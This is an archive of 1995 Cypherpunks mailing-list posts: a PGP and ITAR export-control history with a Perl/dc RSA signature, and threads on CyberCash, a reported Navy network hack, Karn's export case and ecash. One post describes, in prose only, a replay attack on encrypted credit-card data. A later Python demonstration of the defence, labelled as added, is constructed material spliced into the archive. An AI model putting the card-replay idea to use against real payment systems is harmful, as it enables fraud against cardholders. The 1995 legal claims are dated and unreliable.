time that RSA was being published in the face of NSA opposition, etc.

Let me have your comments on the accuracy, plus any anecdotes which
you think really should go in to give the correct feel for the
historical timeline.

Thanks,

Adam

======================================================================
PGP timeline and brief history
======================================================================

contents:

0    Definitions of acronyms

1    History of crypto as it applies to PGP

2    Birth of PGP

3    USG decides they don't like PRZ

4    PRZ, MIT and RSA sort out earlier patent issues

5    Current legal status

6    ITARs viewed from inside the US

7    ITARs viewed from outside the US

======================================================================
0    definitions of acronyms
======================================================================

PGP = Pretty Good Privacy

PRZ = Phil R Zimmermann, internet folk hero, author of PGP

RSA = The RSA public key algorithm as used in PGP

RSADSI = rsa.com, RSA Data Security Inc, patent holders of some public
         key stuff, which they claim means that no one can use RSA without
         getting a license from them.

PKP = public key partners RSADSI plus Cylink (plus others?) (now disbanded)

ITAR = International Traffic in Arms Regulations controls export of
       controlled munitions from the US, things like military
       aircraft components, biological and chemical weapons, and also
       (very strangely) cryptographic software.

PK = public key (crypto)

NSA = US National Security Agency, US govt's largest spook agency.
      whimsically known as No Such Agency, because until recently the US
      govt tried to deny they even existed.

OTDC = Office of Defense Trade Controls, USG group charged with
       enforcing ITAR.  They consult with the NSA, the NSA has the
       last word on what gets export approval.

======================================================================
1    History of crypto as it applies to PGP
======================================================================

1.1  The year is 1976: a cryptographer and privacy advocate named
     Whitfield Diffie, together with a mathematician named Martin Hellman,
     discovers public key cryptography.  (DH key exchange is still a
     commonly used key exchange protocol -- DH = Diffie-Hellman).

1.2  1977 Ron Rivest, Adi Shamir, and Len Adleman discover another more
     general public key system called RSA (after surnames Rivest,
     Shamir, and Adleman).  R, S & A were researchers at MIT
     (significant later, because MIT had part ownership of patents.)

1.3  NSA tells MIT and R, S & A that they'd better not publish this or else.

1.4  Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an
     Israeli national, and is now back in Israel at the Technicon (is
     he, anyone know his current affiliation?)  Who knows what the NSA
     would have done about him if they had succeeded in suppressing RSA
     - not allowed him out of the US?

1.5  MIT and R, S & A ignore NSA and publish anyway in SciAm July
     1977. Comms ACM (feb 1978, vol 21, no 2, pp 120-126 in case 
     you want to see if it's in your library - it's in Exeter Univ
     (UK) library).

1.6  Because the publication was a rush job due to the NSA, R,S & A
     and the later formed PKP and RSADSI lose patent rights
     to RSA crypto outside the US.  This is because most places
     outside the US, you have to obtain a patent *before*
     publication, whereas in the US, you have one year from the
     publication date to file for patents.  This also had implications for
     PGP later.

1.7  IDEA was developed by Xuejia Lai and James Massey at ETH in Zurich.
     (Relevant to PGP because IDEA is the symmetric key cipher used
     together with RSA in PGP).  Also crypto politics relevance in
     that it is another (of many) examples of the fact that crypto
     knowledge and expertise is worldwide, ie why export restrict
     something which is available both sides of the ITAR fence, or
     even originated *outside* it?  (Strangely, ITAR applies to
     importing and then re-exporting a crypto system, even if no
     modifications are made).  There are lots of other symmetric key
     ciphers, IDEA is one with a good reputation (no known practical
     attacks better than brute-force to date, and a good key size), and
     is just referenced here because of its use in PGP.

(some years pass...)

======================================================================
2    Birth of PGP
======================================================================

2.1  PRZ wrote PGP

2.2  PRZ gave PGP to some friends

2.3  some friends uploaded onto a few bulletin boards (US only)
     One friend (allegedly Kelly Goen) went around pay-phones with a
     portable, an acoustic coupler, and a list of BBS phone numbers
     uploading and then driving on to another area.  This cloak and
     dagger stuff was because at the time the USG had some draconian
     sounding proposed law on the books which sounded like it was
     going to outlaw crypto.  The intention was to ensure that PGP was
     available before this law came into effect, and to avoid being
     stopped if the USG took interest.

2.4  somehow PGP leaked outside the US via the internet.  Information
     wants to be free, as someone said: `trying to control the free
     flow of information on the internet is like trying to plug a
     sieve with a hole in it'.  Also Tim May's quote 'National borders are
     just speedbumps on the information superhighway' expresses the
     point very nicely.

2.5  people all over the world (yeah outside the US too) start using PGP

2.6  RSA complains to PRZ that PGP violates their PK patents

2.7  PRZ tells RSA to get stuffed, says it's the users' problem to get a license

2.8  PGP is considered potentially patent infringing because of 2.6

2.9  Illegality taint increases the spread of PGP, generates news, more
     people get a copy to see what the fuss is about

(some time passes, PGP gets real popular...)

======================================================================
3    USG decides they don't like PRZ
======================================================================

3.1  US govt decides that they don't like PRZ because the NSA can't
     tap all those internet mail messages anymore.  (the NSA part is
     speculation, but in my opinion likely true).

3.2  US govt begins investigating PRZ for alleged aiding with ITAR
     violation.

3.3  Phil Zimmermann legal defense fund set up to cover his legal
     expenses

3.4  still ongoing...

(concurrently...)

======================================================================
4    PRZ, MIT and RSA sort out earlier patent issues
======================================================================

4.1  MIT and PRZ work with RSA to sort out patent issue.

4.2  A solution is obtained in that RSA agree that PGP can use RSA
     provided that their RSAREF library is used.

4.3  PGP2.5 is written which uses RSAREF in place of MPILIB (also
     has backwards compatibility with older versions impaired to discourage 
     use of older allegedly patent infringing versions - to keep RSA happy)

4.4  RSAREF may be slower, but at least with some negotiating by PRZ
     and MIT, PGP is now 100% legal in the US

4.5  MIT begins acting as official US distributor of PGP

4.6  As usual, a few milli-seconds (well okay, minutes) after the
     official release of a new version of PGP, it gets exported from
     the US.

4.7  The deal with RSA over RSAREF has fixed the patent related
     problems in the US, but it has created a copyright related
     problem outside the US, (recall 0.6).  RSAREF is a software
     package copyrighted by RSA, and RSA is not allowed to export it
     because of ITAR, and their license agreement says as much (ie it
     says that you must not export it, and if you do export, you, and
     the subsequent users of it, are in breach of license).  It is
     therefore supposed that RSA could if they wanted complain about
     this (who knows that they would want to, or what conceivable
     benefit it would give them if they did).  This isn't enough to
     bother most people, but commercial users, and big organisations
     have lawyers, and are wary of such things.

4.8  Staale Schumacher put together pgp26i to avoid this problem.  Main
     difference between pgp26x and pgp26xi is that pgp26xi uses PRZ's
     original big integer library MPILIB, which is in any case faster than
     RSADSI's RSAREF, and the lack of the legal kludge noted in 3.3.

======================================================================
5    Current legal status
======================================================================

5.1  PGP is legal both inside and outside the US.  You just need to use
     pgp26 versions inside the US, and pgp26xi versions outside the US.

5.2  In the US if you are using PGP in a commercial setting, and care
     about patents, you should purchase a copy of ViaCrypt pgp2.7

5.3 Commercial use outside the US: RSA is free, in the PGP docs (pgp262i
    & pgp262) Ascom-Tech are quoted as saying that currently no license 
    is required for commercial use of PGP outside the US as far as they
    are concerned.  Ascom-Tech are the patent holders of IDEA (see
    1.7), the symmetric crypto system used by PGP.

======================================================================
6    ITARs viewed from inside the US
======================================================================

6.1  ITAR means that if you are in the US you should not export PGP.
     (Yeah it's already available on a few thousand ftp sites around the
     free world, so another export isn't going to make any difference, but
     the NSA and the ODTC might not see it in that light).

6.2  Even though controlling the export of freeware software available
     worldwide might seem incredibly stupid (not to mention
     pointless), you should bear in mind that the penalties for
     getting successfully prosecuted for violating ITAR are rather
     steep.  Up to $1,000,000 (US$) fine, and up to 10 years
     imprisonment per count of export.

6.3  They'd probably never do anything to you, PRZ is just a scapegoat
     (someone they can symbolically persecute to discourage others).
     I have personally seen several people from US sites post crypto
     source and binaries (nautilus, PGP itself even).  Plus of course
     this:

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)

     has probably been exported a few hundred thousand times by now.
     (It's an implementation of RSA encrypt and decrypt in perl and dc
     - a real crypto system, which has every right to claim ITAR
     status if anything does, and yet benefits from being more
     convenient to use as a .sig than a uuencoded PGP binary)

======================================================================
7    ITARs viewed from outside the US
======================================================================

7.3  If you are outside the US, ITAR probably doesn't apply to you. 
     You could, if you could be bothered, download PGP from a
     US site, and short of attempting an extradition for violating a
     regulation which only applies in the US, there would be nothing
     the NSA, or USG could do about it.  Most extradition treaties tend
     to rely on the action being prosecuted being illegal in both
     countries.

7.4  Yeah, I know `tell that to Manuel Noriega' (a Panama citizen who
     was kidnapped by USG undercover agents and brought to the US to
     face trial for importing/exporting drugs from Panama into the US.
     He broke no Panamanian laws, he is a citizen of Panama, and was in
     Panama when he committed his crime, and he is now languishing in
     a US jail).

     However, he was kidnapped for a number of reasons:

        1. the USG thought they could get away with it (Panama owed
           them a few favours)

        2. politically easy to pass off acts of aggression (kidnap by
           civilised countries in this day and age?) in the name of
           the `War on Drugs'

        3. they thought it was worth it.

     Some of these criteria are likely to be missing if there was an
     attempt to extradite a non-US citizen outside the US for breaking
     ITAR.  One big problem is that crypto is not controlled as much
     in most of the free world.  Also the fact that the USG haven't
     bothered other people within the US who have similarly exported
     crypto software (examples cited in 6.3) would make the whole
     situation look rather silly.

7.5  A more important consideration is that although a non-US
     downloader of PGP from a US site would be effectively immune to
     the ITAR nonsense, the owner of the (US based) ftp/www site may
     not be.  You might get the site owner in trouble for not taking
     adequate precautions.  So politeness demands that you don't do
     it.  

7.6  Indeed why bother anyway, because PGP is available from
     literally thousands of ftp sites, there is bound to be a closer
     (and hence likely faster download) copy, without any hoops to
     jump through.

======================================================================

Long live the Pretty Good revolution,

Adam Back <aba@dcs.ex.ac.uk>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Sat, 23 Dec 1995 04:32:35 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: Cybercash questions...
Message-ID: <9511228196.AA819668788@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     Hello,
     
     Just a few questions about Cybercash...
     
     - How is the consumer's credit card # stored on his hard drive?  
     Encrypted with the bank's public key? Or does the consumer have a 
     private key?
     
     
     - How does the merchant know where to ship the goods?  Is the merchant 
     required to ship the goods to the billing address on the cardholder's 
     credit card account?  If so, does the bank provide the merchant with 
     this info?  How is it encrypted?  Or does the customer indicate to the 
     merchant where to ship the goods?  Also, what info does the merchant 
     send to Cybercash, and how is it encrypted?
     
     The fraud possibility I see is that Bob could steal Alice's encrypted 
     credit card number (by sniffing when she buys something at Charlie's 
     Internet shop).  Then, without decrypting it, he could use it (still 
     encrypted) at Don's Internet shop, and ask Don to ship the goods to 
     Bob's address.  Since Don will not decrypt Alice's card number he will 
     not know that it is not Bob's card.  Cybercash will validate Alice's 
     card, but will not know that it is really Bob who is the customer.  
     Don will ship the goods to Bob, and Alice will get a fraudulent charge 
     on her bill.
     
     Am I missing something?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 03:58:39 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <55wx7p3vfz.fsf@galil.austnsc.tandem.com>
Message-ID: <9512221857.AA17752@all.net>
MIME-Version: 1.0
Content-Type: text


> 	I saw the IW article that Light Ray saw in the RISKS Digest,
> and, while it raises some valid questions, it in turn has some internal
> problems.  For example, the IW author apparently doesn't understand the
> difference between a Navy captain (O-6) and an Air Force captain (O-3),
> dismissing the whole story because a Navy captain would be far too old to
> be a 'whizzkid'.

Am I reading a different article? What I read was that the IW person
talked to several inside sources and found out and reported facts.  S/He
made a mistake in saying Navy instead of AF somewhere in his posting to
Risks and fixed it before sending it to the IW list (which is where I
got it).  From what I read, s/he found out the truth from people who
knew the truth and tried to get the word out.

> I would have been able to make captain at 24).  While the ET article
> looks like it was written by someone who didn't understand the fine
> details of what happened, the IW article looks like it was written as
> military smokescreen.

I thought the ET article indicated an exaggeration, but if it's true that
there are no Battleships in the US Navy anymore and that the attack was
run using DoD crypto equipment and networks, it's a heck of a lot
different than buying an off-the-shelf Internet package and taking down
the fleet.

I have no doubt that someone with enough expertise, classified knowledge
and equipment, access, and assistance can get some limited control over
some US Navy ships for some period of time - but I seriously doubt that
a computer whizzkid can take over the fleet from a PC via Email.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:16:17 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: ex encrypted script
Message-ID: <m0tTFol-00090DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 PM 12/21/95 -0800, you wrote:

>
>There is encrypt and then there is render useless to the reader.
>
>A tale I hear is that when HP had to deliver operating system source to
>the french government they stripped all comments and changed all variable
>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>It still compiled but was 100% useless to human readers.
>John Pettitt
>email:         jpettitt@well.sf.ca.us (home)
>               jpp@software.net       (work)    


This is EXACTLY the kind of creative uncooperativeness that I was thinking
of, on a different subject, when I proposed that Netscape do anything it
could think of (legally) to sabotage, undermine, subvert, escape, and
otherwise stifle any attempt by the US government to restrict crypto in
general, or its export in particular.  

The fact is, we are all CREATIVE people, and presumably given any particular
set of rules (laws), it should be possible for us to "comply" with "the
law" in such a way as to be as obstructively obnoxious as possible.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:15:58 +0800
To: cypherpunks@toad.com
Subject: Re: Newsweek Nerd 50
Message-ID: <m0tTFuW-0008xjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 12/21/95 -0600, you wrote:

>Cypherpunk Notables on the List: "Newsweek's Epithet"
>Phil Zimmerman: "Crypto Creator"
>Marc Rotenberg: "Privacy Advocate"
>Sameer Parekh: "Protector of Privacy"
>Johan Helsingius: "Crusader"
>and Steven Levy, who sometimes posts here has the byline on the "Year of
>the Net" feature.
>PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a
>"Geek" for exposing those bogus factors the marketdroids want to use to
>control their survey data back up to the population level.

Of course, Newsweek should have included the "baddies" as well:  Dorothy
Denning would be the Wicked Witch of the West, and Sternlight would have
been one of those Winged Monkeys...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:38:20 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: ex encrypted script
Message-ID: <m0tTFzL-0008y5C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 12/21/95 -0800, you wrote:
difficult for the amateur attacker.

>>
>>A tale I hear is that when HP had to deliver operating system source to
>>the french government they stripped all comments and changed all variable
>>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>>It still compiled but was 100% useless to human readers.
>
>There is a commercial product out there from Gimpel Software called _The C
>Shroud_. It removes all structure from the code, replacing it with gotos,
>renames all the symbols to axxxxxxx, converts constants and strings to hex,
>substitutes all #defines and expands all macros, strips all formatting and
>comments, etc., resulting in a perfectly compilable, but infuriatingly
>obfuscated set of source files.
>Steven Weller 


On the other hand, there are some programmers out there whose work product
makes such a product totally redundant!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Sat, 23 Dec 1995 08:00:21 +0800
Subject: More developments in Karn vs State Dept
Message-ID: <30DB37B1.167EB0E7@qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been updating my web page almost daily with developments
in my case. The latest is that we've written and asked the Court
to accept a Supplementary Memorandum opposing the government's
motion to toss out our suit, and I've backed it up with a Supplementary
Declaration. In it I explain how I just found all of the
source code at issue (the Applied Cryptography diskette) on a public
FTP site in Italy. This took about 10 minutes using Netscape.

I then downloaded the Triple DES code referenced in the earlier
Declarations by NSA Deputy Director Crowell and myself in 1.7
seconds, adding that this is somewhat less time than it takes me
to move to my computer, insert a floppy disk and return to the keyboard.

The government is now asking the judge not to accept these latest
filings. Stay tuned!

The URL again is http://www.qualcomm.com/people/pkarn/export

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Sat, 23 Dec 1995 06:41:09 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512222020.AA20069@all.net>
Message-ID: <55g2ec4xp8.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Fred Cohen) said:

FC> Not my mistake - iw@all.net's mistake - only my correction.  And it
FC> wasn't a correction to an error in this forum - the error appeared
FC> in the Risks forum - the Cypherpunks posting (which I posted) was
FC> the corrected one.  Am I supposed to correct mistakes in other
FC> forums made by other people when I post to Cypherpunks?  (let me
FC> see... in 1928, a mistake was made on page 73 of the New York Times
FC> related to cryptography, ...)

1) The correction makes a difference in the credibility of the
statement, as you must have felt, since you made the change.  Saying
that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish,
while questioning the reasonableness of a reporter calling a 20-ish Air
Force captain a 'whizzkid' is a difference of opinion (see below).
Since you said it was the 'actual text', you should have posted the
actual text, not your correction of it.  If they sent out two messages,
one correcting the other, I find it somewhat difficult to believe that
they didn't at least preface it with a "sorry, we goofed" tag.

FC> Even with only 4 years of service (after graduating from College),
FC> 25-27 years old is no longer whizzkid age in my book.

2) As I said before, had I remained in ROTC, I would have been 24 when
I was eligible to make captain.

3) At 26, I was still being referred to, by non computer-savvy people,
in terms comparable to 'whizzkid'.

FC> But even more
FC> importantly, the readers who commented on this one error ignored the
FC> main body of facts in the posting in favor of creating a conspiracy
FC> theory.  Next we find out from yet another story that at least part
FC> of the original story posted to Risks was in error.  According to
FC> the second independent source, the Captain was working with the
FC> Navy's support and knowledge.  How much do you want to bet that the
FC> story changes again by Tuesday?

4) The original story said that it was a "secret experiment" conducted
in front of "Pentagon VIPs" "at the Electronic Systems Centre at Hanscom
Air Force Base".  Saying that the Navy was informed that this test would
be made, or that Navy personnel were among the watching VIPs, is
unremarkable, and does not call into question the original report.
There were many security 'surveys' conducted against my systems by AFIWC
(sorry, I don't remember the name of the specific group that does the
surveys, but it's part of AFCERT) which I was unaware of which were
authorized by the Air Force - in fact, I wouldn't be surprised if the
"young Air Force captain" was from that group.

5) The second independent source backs up the report that the connection
was made through the Internet, involving email connectivity, and with a
personal computer and modem, all of which were specifically denied in
the message from IW.

	Now that I've addressed ALL of the points in the 'denial' from
IW, do you see why I characterized it as a military smokescreen?  The
only thing in it which remains unchallenged is that the original report
is inaccurate in detail, and that there is a question as to whether
someone in their mid-20s is a 'whizzkid'.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sat, 23 Dec 1995 07:51:05 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Navy hacked by Air Force?
Message-ID: <m0tTGeA-000RpHC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 PM 12/22/95 -0500, Vin McLellan wrote:
>        Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....
>
>        I'm new to C'punks, so I don't yet have a grip on the context in
>which you consider privacy, property, and other ultimate values.  I do
>wonder, though: Do you spend a lot of time pissin' on each other's shoes
>like this?

Laughing my ass off here.. not yet I have seen someone so precisely hit the
nail on the head..
Seems this is happening a lot lately.. must be the tension of the holiday
season.. <g>

Guess I need to start adding plastic shoe-guards to the C-punk kit.. ;)

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 05:17:09 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55oht13r97.fsf@galil.austnsc.tandem.com>
Message-ID: <9512222020.AA20069@all.net>
MIME-Version: 1.0
Content-Type: text


> fc@all.net (Fred Cohen) said:
> 
> FC> Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I
> FC> find one that I've made, I try to admit it and fix it ASAP.  What's
> FC> not credible is people who don't correct mistakes when they find
> FC> them.
> 
> 	Well, you corrected it, but you didn't admit it, at least not
> here, and it makes people who made comments on the _original_ version
> look like fools.  Next time when you quote a corrected article, please
> note that it's been corrected.  The difference between an AF captain (4
> years of service) and a Navy captain (17-ish years of service) is
> substantial when judging whether they could be considered
> 'whizzkids' in this environment.

Not my mistake - iw@all.net's mistake - only my correction.  And it
wasn't a correction to an error in this forum - the error appeared in
the Risks forum - the Cypherpunks posting (which I posted) was the
corrected one.  Am I supposed to correct mistakes in other forums made
by other people when I post to Cypherpunks?  (let me see... in 1928, a
mistake was made on page 73 of the New York Times related to cryptography, ...)

Even with only 4 years of service (after graduating from College), 25-27
years old is no longer whizzkid age in my book.  But even more
importantly, the readers who commented on this one error ignored the
main body of facts in the posting in favor of creating a conspiracy
theory.  Next we find out from yet another story that at least part of
the original story posted to Risks was in error.  According to the
second independent source, the Captain was working with the Navy's
support and knowledge.  How much do you want to bet that the story
changes again by Tuesday?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sat, 23 Dec 1995 05:05:42 +0800
To: David Klur <dklur@dttus.com>
Subject: Re: Cybercash questions...
In-Reply-To: <9511228196.AA819668788@cc1.dttus.com>
Message-ID: <Pine.SUN.3.91.951222152659.29664G-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, David Klur wrote:

>      
>      Hello,
>      
>      Just a few questions about Cybercash...
>      
>      - How is the consumer's credit card # stored on his hard drive?  
>      Encrypted with the bank's public key? Or does the consumer have a 
>      private key?

The customer has a private key.  Customer info on their machine is
encrypted under a password.

>      - How does the merchant know where to ship the goods?  Is the merchant 
>      required to ship the goods to the billing address on the cardholder's 
>      credit card account?  If so, does the bank provide the merchant with 
>      this info?  How is it encrypted?  Or does the customer indicate to the 
>      merchant where to ship the goods?  Also, what info does the merchant 
>      send to Cybercash, and how is it encrypted?

Billing address establishment is part of shopping.  It need not be
the card billing address.  But the customer needs to enter an
address when setting up their credit card. see
	draft-eastlake-cybercash-v08-01.txt
in any of the IETF shadow directories.

>      The fraud possibility I see is that Bob could steal Alice's encrypted 
>      credit card number (by sniffing when she buys something at Charlie's 
>      Internet shop).  Then, without decrypting it, he could use it (still 
>      encrypted) at Don's Internet shop, and ask Don to ship the goods to 
>      Bob's address.  Since Don will not decrypt Alice's card number he will 
>      not know that it is not Bob's card.  Cybercash will validate Alice's 
>      card, but will not know that it is really Bob who is the customer.  
>      Don will ship the goods to Bob, and Alice will get a fraudulent charge 
>      on her bill.

The customer signs the message including the merchant id and order id
before encrypting a bunch of stuff including the credit card number
to send to the merchant.  There isn't anything useful to steal from
the encrypted part of that message.

>      Am I missing something?

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
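
The binding described in the reply above (merchant id and order id covered by the customer's signature) is what defeats the replay David Klur asks about. The following is an added example, not part of the original message and not CyberCash's code: an HMAC under a key shared by customer and gateway stands in for the customer's public-key signature, the encryption layer is omitted, and the `Gateway` class, field names, shop names, key and card number are all constructed assumptions.

```python
import hashlib
import hmac
import json


def sign_payment(customer_key: bytes, card_number: str, merchant_id: str,
                 order_id: str, amount_cents: int) -> dict:
    """Customer side: authenticate the card data TOGETHER with the merchant
    and order it is meant for (HMAC stands in for a real signature)."""
    body = json.dumps(
        {"card": card_number, "merchant_id": merchant_id,
         "order_id": order_id, "amount_cents": amount_cents},
        sort_keys=True,
    ).encode()
    sig = hmac.new(customer_key, body, hashlib.sha256).digest()
    return {"body": body, "sig": sig}


class Gateway:
    """Hypothetical payment gateway. The merchant forwards the customer's
    blob unchanged and states its own merchant id and order id."""

    def __init__(self, customer_keys):
        self.customer_keys = dict(customer_keys)
        self.used_orders = set()  # (merchant_id, order_id) pairs already paid

    def authorize(self, customer_id, blob, merchant_id, order_id) -> str:
        key = self.customer_keys.get(customer_id)
        if key is None:
            return "reject: unknown customer"
        expected = hmac.new(key, blob["body"], hashlib.sha256).digest()
        if not hmac.compare_digest(expected, blob["sig"]):
            return "reject: bad signature"
        signed = json.loads(blob["body"])
        # The checks that matter for the replay question: the signed ids
        # must match the merchant and order actually presenting the blob.
        if signed["merchant_id"] != merchant_id:
            return "reject: signed for a different merchant"
        if signed["order_id"] != order_id:
            return "reject: signed for a different order"
        if (merchant_id, order_id) in self.used_orders:
            return "reject: order already processed"
        self.used_orders.add((merchant_id, order_id))
        return "approve"


def demo() -> dict:
    alice_key = b"constructed-demo-key-alice"      # constructed sample key
    gateway = Gateway({"alice": alice_key})
    blob = sign_payment(alice_key, "0000-0000-0000-0000",  # constructed card
                        "charlie-shop", "order-1001", 2500)
    results = {}
    # Alice's real purchase at Charlie's shop.
    results["legit"] = gateway.authorize(
        "alice", blob, "charlie-shop", "order-1001")
    # The captured blob presented unchanged through Don's shop.
    results["replay_at_don"] = gateway.authorize(
        "alice", blob, "don-shop", "order-77")
    # The captured blob presented again at Charlie's shop.
    results["replay_same_order"] = gateway.authorize(
        "alice", blob, "charlie-shop", "order-1001")
    results["replay_new_order"] = gateway.authorize(
        "alice", blob, "charlie-shop", "order-1002")
    # Rewriting the merchant id inside the body breaks the signature.
    rewritten = dict(blob, body=blob["body"].replace(b"charlie-shop", b"don-shop"))
    results["rewritten_body"] = gateway.authorize(
        "alice", rewritten, "don-shop", "order-77")
    return results


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:20s} {verdict}")
```

If the merchant and order ids were left out of the signed body, the first two checks would have nothing to compare against and the captured blob would be accepted at any merchant.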




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove@vnet3.vub.ac.be (Leo Van Hove)
Date: Sat, 23 Dec 1995 08:09:11 +0800
To: ecash@digicash.com
Subject: Re: [ecash] Re: Multi-issuer questions
Message-ID: <v01530501ad006a1fc797@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list:
>
>> Q: If user A signs up with bank A, and merchant B signs up with bank B,
>> can user A buy at merchant B?
>>
>> A: In theory:
>>
>> Bank A and bank B need to have an interbank clearing agreement. User
>> A sends his money to merchant B. Merchant B contacts his own bank,
>> bank B. Bank B recognizes the money as being issued at bank A,
>> contacts bank A, and clears the coins there. Bank A credits bank B's
>> account at bank A, bank B sends an acknowledge to merchant B and
>> merchant B sends the goods to user A.
>

On Fri, 22 Dec 1995, Patiwat Panurach <pati@ipied.tu.ac.th> replied:

>        I dispute this even on theoretical grounds.
>
>Am I right in assuming that the only reason Bank B has in contacting Bank
>A is to confirm that the ecash hasn't been double spent?  Once that is
>confirmed, there should be no need for contact between the two banks.
>Bank A should not have to credit Bank B's account as there has been no
>transfer from Bank A to Bank B.  The transfer has been the deposit from
          ---------------------
I guess you mean: from Bank B to Bank A

>Bank B's customer to Bank B. Bank B is already "credited", i.e., its
>(e)cash reserves have increased, the moment Bank A confirms that the
>ecash is valid.
>

In my understanding - and I'm sure Marcel van der Peijl :-) will correct me :-(
if I'm wrong - the only way Bank B can verify with Bank A that the
ecash it has received from merchant B has not been spent before is by
actually sending the _coins_ to Bank A.  Hence there _is_ a transfer from
Bank B to Bank A and thus Bank A has to credit Bank B's account...

Marcel?

Ciao,

leo



_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 2 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be

VUB's Web site: http://www.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 08:49:37 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <199512230006.QAA06030@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, Vin McLellan wrote:

>         This might be relevant. This is a page from the NCCOSC web site
> <http://www.nosc.mil>

Thanks for posting this.  It was very helpful.  

>         The Naval Command, Control  & Ocean Surveillance Center (NCCOSC)
> is the U.S. Navy's warfare center for command, control and communication
> systems and ocean surveillance and the integration of those systems which
> overarch multiplatforms. NCCOSC is based in San Diego, CA.
> 
>         Note that NCCOSC recently decided to beef up NCI's user
> authentication.  See "Current Initiatives."

Duly noted ... (as long as it don't lead to a false sense of security)

> [* ] NCI net - What it is
> 
>    * An enterprise network serving NCCOSC and other communities of interest
>    * Modelled after the global Internet, logically part of the Internet
         ...
>    * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
>      the organization and to the Internet
>    * Provides dialup access from home or TDY via 1-800 number, including
>      SLIP and PPP support

Betchya that WATS line gets a whole lotta billings to it. <p>

>    * MIME adopted as corporate email standard, email systems upgraded
>         o Many user agents upgraded to MIME compliance
>         o Testing gateways for interoperability with non-compliant systems
>         o Performing extensive interoperability tests

MIME??!!??  They adopted MIME??!!?? 

Good grief.  This is not good ... not good at all.  

>    * New sites connected
>         o CINCLANTFLT, Norfolk, VA
>         o The Pentagon
>              + BRAC Office
>              + OSS LAN
